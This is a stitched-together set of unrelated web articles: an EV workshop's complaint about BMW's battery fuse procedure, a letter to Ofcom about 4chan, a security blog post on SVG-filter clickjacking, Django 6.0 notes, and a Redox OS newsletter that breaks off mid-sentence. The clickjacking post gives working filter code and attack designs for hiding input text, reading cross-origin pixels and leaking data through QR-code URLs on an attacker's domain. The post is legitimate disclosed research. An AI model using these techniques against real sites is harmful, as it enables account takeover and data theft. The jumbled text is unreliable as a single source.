Lot of vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a missleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates and unnecessary parts manufacturing cycles, overcomplicated service procedures, far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating real ECO footprint of replacement part manucfacturing, unecessary servicing and real waste cost?
We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.
ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock modules.
Meaning: even in an authorised service centre, system can accidentally delete the configuration and end up needing not only a new iBMUCP, but also all new battery modules.
Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, costing €6,000+ VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.
The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.
One more next problem: Battery erasal can happen in OEM and can happen in our or any other 3rd party workshop, but if procedure was started in workshop 1, it cant be continued in workshop 2. If battery damage happens in our workshop during fuse change, and than battery swap needed, we or even OEM workshop do not cover costs of completely new battery pack. Which increases heavily ownership costs.
All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and the BMS reset is around 50€, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety, no benefit to anti-theft protection — the only outcome is the generation of billable labour hours and massive amounts of needless electronic/lithium waste.
Beyond that, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents together with our colleagues from Hungary. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction that the EU keeps missleading— since the manufacturers clearly won’t.
Part number: 61 27 8 880 208
Faults: 21F2A8 High voltage battery unit, terminal
High voltage battery safety: capsule Defective trigger/control electronics
21F35B high voltage battery unit,
voltage and electric current sensor, current: Counter for the reuse of cell modules exceeded (safety function)
21F393 High voltage battery unit, fault
cumulative: Memory of faults that prevent the
active transport
3B001D High voltage battery unit,
contactor excitation controller circuit breakers: Double fault
21F37E Collision Detection: Collision
detected due to ACSM signal
21F04B High voltage battery unit,
Safety function: Reset command units executed
OEM Service cost: 4000€+tax (aprox – if you have bmw quote, send)
OEM iBMUCP : 1100€+tax
Labor hours: 24h – 50h
EVC: 2500€+tax (full service)
**It is cheaper to change LG Battery on Tesla, than changing fuse on BMW PHEV, and probably even less CO2 footpring
If you want to book your service with EV CLINIC:
Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenija: www.evclinic.si
Serbia: www.evclinic.rs
This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, should prefer to keep secret. See
Part 1
,
Part 2
, and
Part 3
.
We heard from Ofcom again today.
The agency writes:
The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.
Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.
The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).
After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.
Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy,
let it be known on GB News
, in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.
The GRANITE Act
, at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State,
turned it into a bill
. Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.
The proposal was inspired by your agency’s censorship letters, letters targeting Amercians in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.
It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.
4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.
Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.
Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.
I copy the U.S. government and government officials in several states. My client reserves all rights.
Preston Byrne
—
Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.
There is a possible future, in the very near future, where these notices will be utterly impossible for foreign governments to send to American citizens – notices I have been parrying, professionally, for eight years.
America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.
Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.
I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.
I call this technique “
SVG clickjacking
”.
Liquid SVGs
The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.
Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had
a pretty accurate CSS/SVG recreation of the effect
1
.
EMERGENCY!
Girls Rituals
This Won't Be The Last Time
acloudyskye
SOUND BANDIT FUCKING LIVES
Sound Bandit
Love & Ponystep
Vylet Pony
I Love My Computer
Ninajirachi
You can drag around the effect with the
bottom-right circle control thing
in the demo above (chrome/firefox desktop, chrome mobile).
Note: This demo is broken in Safari, sorry.
My little tech demo made quite a splash online, and even resulted in a
news article
with what is probably the wildest quote about me to date:
“Samsung and others have nothing on her”
.
A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?
Like, surely not? The way the effect “refracts light”
2
is way too complex to work on a cross-origin document.
But, to my surprise, it did.
The reason this was so interesting to me is that my liquid glass effect uses the
feColorMatrix
and
feDisplacementMap
SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?
This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s
all of them, and yes!
Building blocks
I got to work, going through every
<fe*>
SVG element and figuring out which ones can be combined to build our own attack primitives.
These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.
Let’s take a look at some of the more useful base elements we can play with:
<feComposite>
- compositing utilities, can be used to apply an alpha matte, or do various arithmetics on one or two inputs;
<feColorMatrix>
- apply a color matrix, this allows moving colors between channels and converting between alpha and luma mattes;
That’s quite a selection of utilities!
If you’re a demoscener
3
you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.
Fake captcha
I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You
could
ask the user to retype it by itself, but that’d probably seem suspicious.
What we can do instead is make use of
feDisplacementMap
to make the text seem like a captcha! This way, the user is far more likely to retype the code.
Note: Only the part inside the
<filter>
block is relevant, the rest is just an example of using filters.
Add to this some
color effects and random lines
, and you’ve got a pretty convincing cap
-
tcha!
Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.
Still, it could come in handy because often times you’re allowed to frame read-only API endpoints, so maybe there’s an attack there to discover.
Grey text hiding
The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.
Let’s take a look at our example target (try typing in the box).
Set a new password
too short
In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.
Let’s start off by using
feComposite
with arithmetics to make the grey text disappear. The
arithmetic
operation takes in two images,
i1
(
in=...
) and
i2
(
in2=...
), and lets us do per-pixel maths with
k1
,
k2
,
k3
,
k4
as the arguments according to this formula:
4
.
Set a new password
too short
<feCompositeoperator=arithmetick1=0k2=4k3=0k4=0/>
Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.
It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.
We
could
play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we’d still have the black text look the way usually does, just without any grey text. Is that possible?
So here’s where a really cool technique comes into play - masking. We’re going to create a matte to “cut out” the black text and cover up everything else. It’s going to take us quite a few steps to get to the desired result, so lets go through it bit-by-bit.
We start off by cropping the result of our black text filter with
feTile
.
Set a new password
too short
<feTilex=20y=56width=184height=22/>
Note: Safari seems to be having some trouble with
feTile
, so if
the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If
you're writing an attack for Safari, you can also achieve cropping by making a luma matte with
feFlood
and then applying it.
Then we use
feMorphology
to increase the thickness of the text.
Set a new password
too short
<feMorphologyoperator=eroderadius=3result=thick/>
Now we have to increase the contrast of the mask. I’m going to do it by first using
feFlood
to create a solid white image, which we can then
feBlend
with
difference
to invert our mask. And then we can use
feComposite
to multiply
5
the mask for better contrast.
We have a luma matte now! All that’s left is to convert it into an alpha matte with
feColorMatrix
, apply it to the source image with
feComposite
, and make the background white with
feBlend
.
Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.
There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.
You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.
Pixel reading
And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.
The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out
6
. Despite that, it is very powerful if you get creative with it.
On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.
Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.
<--- very cool! click to change color
For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.
All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.
Let’s start off by using two copies of the
feTile
filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image.
The result is that we now have the entire screen filled with the color of the area we are interested in.
<--- very cool! click to change color
<feCompositeoperator=arithmetick2=100/>
We can turn this result into a binary on/off value by using
feComposite
’s arithmetic the same way as in the last section, but with a way larger
k2
value. This makes it so that the output image is either completely black or completely white.
And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.
So that’s how you can find out whether a pixel is black and use that to toggle a filter!
<--- very cool! click to change color
Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!
How can we adapt this technique to work with arbitrary colors and textures?
<--- very cool! click to change color
<!-- crop to first stripe of the flag --><feTilex="22"y="22"width="4"height="4"/>
<feTilex="0"y="0"result="col"width="100%"height="100%"/><!-- generate a color to diff against --><feFloodflood-color="#5BCFFA"result="blue"/>
<feBlendmode="difference"in="col"in2="blue"/><!-- k4 is for more lenient threshold --><feCompositeoperator=arithmetick2=100k4=-5/><!-- do the masking and blur stuff... -->
...
The solution is pretty simple - we can simply use
feBlend
’s difference combined with a
feColorMatrix
to join the color channels to turn the image into a similar black/white matte as before. For textures we can use
feImage
, and for non-exact colors we can use a bit of
feComposite
’s arithmetic to make the matching threshold more lenient.
And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.
Logic gates
But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.
By using
feBlend
and
feComposite
, we can recreate all logic gates and make SVG filters
functionally complete
. This means that we can program anything we want, as long as it is not timing-based
7
and doesn’t take up too many resources
8
.
Input:
NOT:
<feBlend mode=difference in2=white />
AND:
<feComposite operator=arithmetic k1=1 />
OR:
<feComposite operator=arithmetic k2=1 k3=1 />
XOR:
<feBlend mode=difference in=a in2=b />
NAND:
(AND + NOT)
NOR:
(OR + NOT)
XNOR:
(XOR + NOT)
These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:
This is a
full adder
circuit. This filter implements the logic gates
for the output and
for the carry bit using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.
<!-- util --><feOffsetin="SourceGraphic"dx="0"dy="0"result=src/>
<feTilex="16px"y="16px"width="4"height="4"in=src/>
<feTilex="0"y="0"width="100%"height="100%"result=a/>
<feTilex="48px"y="16px"width="4"height="4"in=src/>
<feTilex="0"y="0"width="100%"height="100%"result=b/>
<feTilex="72px"y="16px"width="4"height="4"in=src/>
<feTilex="0"y="0"width="100%"height="100%"result=c/>
<feFloodflood-color=#FFFresult=white/><!-- A ⊕ B --><feBlendmode=differencein=ain2=bresult=ab/><!-- [A ⊕ B] ⊕ C --><feBlendmode=differencein2=c/><!-- Save result to 'out' --><feTilex="96px"y="0px"width="32"height="32"result=out/><!-- C ∧ [A ⊕ B] --><feCompositeoperator=arithmetick1=1in=abin2=cresult=abc/><!-- (A ∧ B) --><feCompositeoperator=arithmetick1=1in=ain2=b/><!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] --><feCompositeoperator=arithmetick2=1k3=1in2=abc/><!-- Save result to 'carry' --><feTilex="64px"y="32px"width="32"height="32"result=carry/><!-- Combine results --><feBlendin2=out/>
<feBlendin2=srcresult=done/><!-- Shift first row to last --><feTilex="0"y="0"width="100%"height="32"/>
<feTilex="0"y="0"width="100%"height="100%"result=lastrow/>
<feOffsetdx="0"dy="-32"in=done/>
<feBlendin2=lastrow/><!-- Crop to output --><feTilex="0"y="0"width="100%"height="100%"/>
Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.
Securify
Welcome to this secure application!
This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:
Clicking a button to open a dialog
Waiting for the dialog to load
Clicking a checkbox within the dialog
Clicking another button in the dialog
Checking for the red text that appeared
Securify
Welcome to this secure application!
Win free iPod by following the steps below.
1. Click here
2. Wait 3 seconds
3. Click
4. Click here
A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.
There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.
Anyways, let’s build out a logic tree for a filter-based attack:
Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.
But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.
I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.
In fact…
The Docs bug
I’ve actually managed to pull off this attack against Google Docs!
Makes the user click on the “Generate Document” button
Once pressed, detects the popup and shows a textbox for the user to type a “captcha” into
The textbox starts off with a gradient animation, which must be handled
The textbox has focus states, which must also be present in the attack visuals, so they must be detected by the background color of the textbox
The textbox has grey text for both a placeholder AND suggestions, which must be hidden with the technique discussed earlier
Once the captcha is typed, makes the user seemingly click on a button (or press enter), which causes a suggested Docs item to be added into the textbox
This item must be detected by looking for its background color in the textbox
Once the item is detected, the textbox must be hidden and another button must be shown instead
Once that button is clicked, a loading screen appears, which must be detected
If the loading screen is present, or the dialog is not visible and the “Generate Document” button is not present, the attack is over and the final screen must be shown
In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.
Google VRP awarded me
$3133.70
for the find. That was, of course,
right before
they introduced a novelty bonus for new vulnerability classes. Hmph!
10
The QR attack
Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.
I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.
I turns out though, that my SVG filters attack technique can be applied to QR codes as well!
The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.
But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?
Creating the QR
Creating a QR code within an SVG filter is easier said than done however. We can shape binary data into the shape of a QR code by using
feDisplacementMap
, but for a QR code to be scannable it also needs error correction data.
QR codes use
Reed-Solomon error correction
, which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.
Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person
11
to
make a QR code generator in Minecraft
, so I’ve already figured out the things necessary.
In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.
This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).
Hover to see QR
This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work make sure that you aren’t using any
display scaling
or
a custom color profile
. On Windows you can toggle the
Automatically manage color for apps
setting, and on a Mac you can set the color profile to sRGB for it to work.
This demo
does not work on mobile devices
. And also, for the time being,
it only works in Chromium-based browsers
, but I believe it could be made to work in Firefox too.
Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.
But yeah, that’s a QR code generator built inside an SVG filter!
Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.
Attack scenario
So the attack scenario with the QR code is that you’d read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like
https://lyra.
horse
/?ref=c3VwZXIgc2VjcmV0IGluZm8
and render it as a QR code.
Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.
Once the user opens the URL, your server gets the request and receives the data from the URL.
And so on..
There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.
You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the
pointer
cursor
and reacts to fake buttons inside your SVG to make the exfiltration more realistic.
Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.
Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.
Novel technique
This is the first time in my security research I’ve found a completely new technique!
I introduced it briefly at
my BSides talk in September
, and this post here is a more in-depth overview of the technique and how it can be used.
Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?
Another example of logic gates in SVG I found after writing my blog. It’s fun because it comes with
reddit
and
hn
threads - I particularly like the comment asking about whether this turing completeness is useful or just a fun fact, which got a reply confirming the latter.
I like turning fun facts into vulnerabilities ^^.
Note that whether SVG filters are actually turing complete is questionable because filters are implemented in constant-time and can’t run in a loop. This doesn’t mean they can’t be turing complete, but it also doesn’t prove that they are.
I don’t think
me
discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.
That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what
Antonymph
was born out of.
In any case,
it feels
yay
:3
woof
yippie
waow
awesome
meow
awrf
to discover
something like this.
afterword
whoa this post took such a long time for me to get done!
i started work on it in july, and was expecting to release it alongside
my CSS talk
in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.
unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.
also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings.
finding responsibility
is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and
youre the one ive always wanted
is slightly nsfw doggyhell vent art.
btw i’ll soon be giving talks at
39c3
and
disobey 2026
! the 39c3 one is titled “
css clicker training
” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.
see y’all around!!
<3
Note: I you’re making content (articles, videos etc) based on this post, feel free to
reach out
to me to ask for questions or feedback.
Django 6.0 released
Django 6.0 includes a flurry of neat features, but the two that most caught my eye are background workers and template partials.
Background workers started out as DEP (Django Enhancement Proposal) 14, proposed and shepherded by Jake Howard. Jake prototyped the feature in django-t...
Kevin Wetzels published a useful
first look at Django's background tasks
based on the earlier RC, including notes on building a custom database-backed worker implementation.
Template Partials
were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from
the documentation
showing the neat
inline
attribute which lets you both use and define a partial at the same time:
{# Define and render immediately. #}{%partialdefuser-infoinline%}
<divid="user-info-{{ user.username }}">
<h3>{{ user.name }}</h3>
<p>{{ user.bio }}</p>
</div>
{%endpartialdef%}{# Other page content here. #}{# Reuse later elsewhere in the template. #}
<sectionclass="featured-authors">
<h2>Featured Authors</h2>
{%foruserinfeatured%}{%partialuser-info%}{%endfor%}
</section>
You can also render just a named partial from a template directly in Python code like this:
I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.
I recently...
I take tap dance evening classes at the
College of San Mateo
community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.
I recently wrote about
Coutellerie Nontronnaise
on my Niche Museums website, a historic knife manufactory in Nontron, France. They had
a certificate on the wall
claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.
I posed this as a text message challenge to the librarians, and they tracked down
the exact page
from the 1989 "Le livre guinness des records" describing the record!
Le plus petit
Les établissements Nontronnaise ont réalisé un couteau de 10 mm de long, pour le Festival d’Aubigny, Vendée, qui s’est déroulé du 4 au 5 juillet 1987.
WebKitGTK3 web browser example and bottom system monitor
Redox OS is a complete Unix-like general-purpose microkernel-based operating system
written in Rust. November was a very exciting month for Redox! Here’s all the latest news.
Donate to Redox
If you would like to support Redox, please consider donating or buying some merch!
Jeremy Soller successfully ported the
Smallvil
Wayland compositor example from the
Smithay
framework and GTK3 Wayland to Redox.
Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing),
Wildan Mubarok (bug fixing and implementation of missing functions),
and other contributors for making it possible.
Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support,
but this represents a huge step forward.
GTK3 Wayland Demo running on Smallvil compositor
WebKitGTK on Redox!
Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to other contributors which helped us to achieve this.
This is first full-featured browser engine ported to Redox, allowing most websites to work.
MATE Desktop on Redox!
Jeremy Soller was porting MATE Marco for a better X11 window manager and decided to port a basic MATE desktop.
More Boot Fixes
Jeremy Soller added and fixed many driver timeouts to block more infinite loop bugs and continue booting, he also updated system components and drivers to deamonize after starting and moved the hardware initialization to their child process to fix hangs and allow the boot to continue in more hardware.
If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.
Migration to i586
The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use
i586
as the CPU architecture target name for 32-bit x86 computers.
Jeremy Soller and Wildan Mubarok implemented a feature to allow recipes to configure what build tools they need,
and these build tools being available as recipes. It will allow the following benefits:
Simplifies the Redox build system, so applications, libraries, and build tools use the same build environment and packaging system
Greatly reduces build system configuration time in both Podman and Native builds,
as developers will only install the build tools for the recipes that they are using
Removes the maintenance effort of updating the list of build tool packages required for each Unix-like platform whenever a build tool package is added for the Native Build
Jeremy Soller unified the build system repositories,
merging the submodules into the
main build system repository
.
This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.
If you haven’t updated your build system yet, you should backup your changes,
and either run the
make distclean pull container_clean all
command, or download a new build system copy (
git clone https://gitlab.redox-os.org/redox-os/redox.git
)
and build from scratch.
More GitLab Protection
After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again)
and AI scrapers were consuming the server resources making it very slow.
As a consequence, we increased our protection, which changed some things:
By default, only maintainers can run CI jobs.
If you are working on solving CI problems, let us know and we can discuss temporary access to CI.
Git code push using SSH has been disabled until we find a way to fix it.
All contributors will need to use HTTPS with a PAT (Personal Access Token) for
git push
usage.
(kernel) 4lDO2 fixed a memory allocator panic and data corruption bug
(kernel) Jeremy Soller enabled serial interrupts in ARM64 ACPI
(kernel) Jeremy Soller implemented nested event queues
(kernel) Jeremy Soller implemented
kfpath
in some schemes
(kernel) Jeremy Soller implemented
F_DUPFD_CLOEXEC
(kernel) Jeremy Soller improved the futex lockup performance
(kernel) Jeremy Soller improved CPU stat accuracy
(kernel) Jeremy Soller improved the i586 CPU stats
(kernel) Jeremy Soller fixed an event queue race condition with pipes
(kernel) Jeremy Soller reduced warnings for legacy scheme path on GUI applications
(kernel) Anhad Singh fixed some deadlocks
(kernel) bjorn3 did some code cleanups
(kernel) AArch Angel implemented
kfpath
on DTB scheme
Driver Improvements
(drivers) Jeremy Soller fixed missing PCI devices in Intel Arrow Lake computers
(drivers) Jeremy Soller improved the PS/2 driver stability
(drivers) Jeremy Soller improved the Intel HD Audio driver error handling
(drivers) Jeremy Soller implemented unaligned access on the PCI driver
(drivers) Ibuki Omatsu updated the
alxd
,
ihdad
,
ac97d
, and
sb16d
drivers to use the
redox-scheme
library, which makes them up-to-date
(drivers) bjorn3 unified the interrupt vector handling code between the Intel HD Audio and Realtek ethernet drivers
(drivers) bjorn3 merged the
drivers
repository into the
base
repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration.
System Improvements
(sys) Jeremy Soller improved log verbosity on system bootstrap
(sys) Jeremy Soller implemented support for
MSG_DONTWAIT
in Unix Domain Sockets
(sys) Jeremy Soller implemented
SO_PEERCRED
in Unix streams
(sys) Jeremy Soller implemented the
fpath()
function in the
proc
scheme
(sys) Jeremy Soller implemented the
fstat()
function in the IPC daemon
(sys) Jeremy Soller did a refactor of
fevent()
function handling
(sys) Jeremy Soller fixed
SO_SNDBUF
in IPC daemon
(sys) Jeremy Soller replaced the Smith text editor by Kibi in the
minimal
variants
(sys) bjorn3 reduced the uutils compilation time by a third (2m50s to 1m56s on his computer) by using
ThinLTO
instead of
FatLTO
(sys) bjorn3 fixed some code warnings
Relibc Improvements
(libc) 4lDO2 implemented a macro to verify if the relibc internal definitions match the Rust libc crate definitions
(libc) Jeremy Soller implemented the
sys/queue.h
function group
(libc) Jeremy Soller improved the TLS alignment reliability
(libc) Jeremy Soller improved the safety of programs that close file descriptors in a range
(libc) Jeremy Soller implemented the
ppoll()
function
(libc) Jeremy Soller fixed a possible POSIX thread key collision
(libc) Jeremy Soller fixed the
ai_addrlen
and
socklen_t
type definitions
(libc) Josh Megnauth implemented the
posix_fallocate()
function
(libc) Ibuki Omatsu fixed the
getpeername()
function in Unix Streams
(libc) Wildan Mubarok fixed the
getsubopt()
function
(libc) auronandace improved the documentation of some POSIX functions
Networking Improvements
(net) Wildan Mubarok improved the network stack error handling
RedoxFS Improvements
(redoxfs) Jeremy Soller updated the
fpath()
function to use the new scheme format
(redoxfs) Jeremy Soller fixed a panic due to inline data overflow
Orbital Improvements
(gui) bjorn3 did some code refactorings
(gui) Wildan Mubarok fixed the
orbclient
example
(gui) Wildan Mubarok optimized the
orbclient
library gradient calculation
Programs
(programs) Jeremy Soller updated the Rust recipe version to match the Redox cross-compiler on Linux
(programs) Jeremy Soller enabled DRI3 on Mesa3D and X11
(programs) Jeremy Soller updated GnuTLS to use dynamic linking
(programs) Jeremy Soller fixed the Luanti and
librsvg
compilation
(programs) Wildan Mubarok ported the EGL code from Mesa3D
(programs) Wildan Mubarok fixed OpenLara and Rustual Boy compilation
(programs) Anhad Singh fixed the Fish shell execution
Packaging Improvements
(pkg) Wildan Mubarok started to implement recipe features which will allow more flexibility with software options
(pkg) Wildan Mubarok implemented recursive recipe dependencies which will allow us to use implicit dependencies (remove duplicated dependencies) and reduce maintenance cost
(pkg) Wildan Mubarok implemented package size and BLAKE3 hash on package information, which allow accurate download progress bar and package update verification
(pkg) Wildan Mubarok fixed the package manager not detecting installed packages from the build system
Debugging Improvements
(debug) Jeremy Soller implemented the support for userspace stack traces
(debug) Jeremy Soller reduced unnecessary logging on system components and drivers to ease boot problem reporting
Build System Improvements
(build) Wildan Mubarok implemented an option (
FSTOOLS_IN_PODMAN
environment variable) to build and run the filesystem tools in the Podman container, it fixes a problem with FUSE on MacOS, NixOS and GuixSD
(build) Wildan Mubarok updated the Cargo recipe template to use dynamic linking
(build) Wildan Mubarok improved
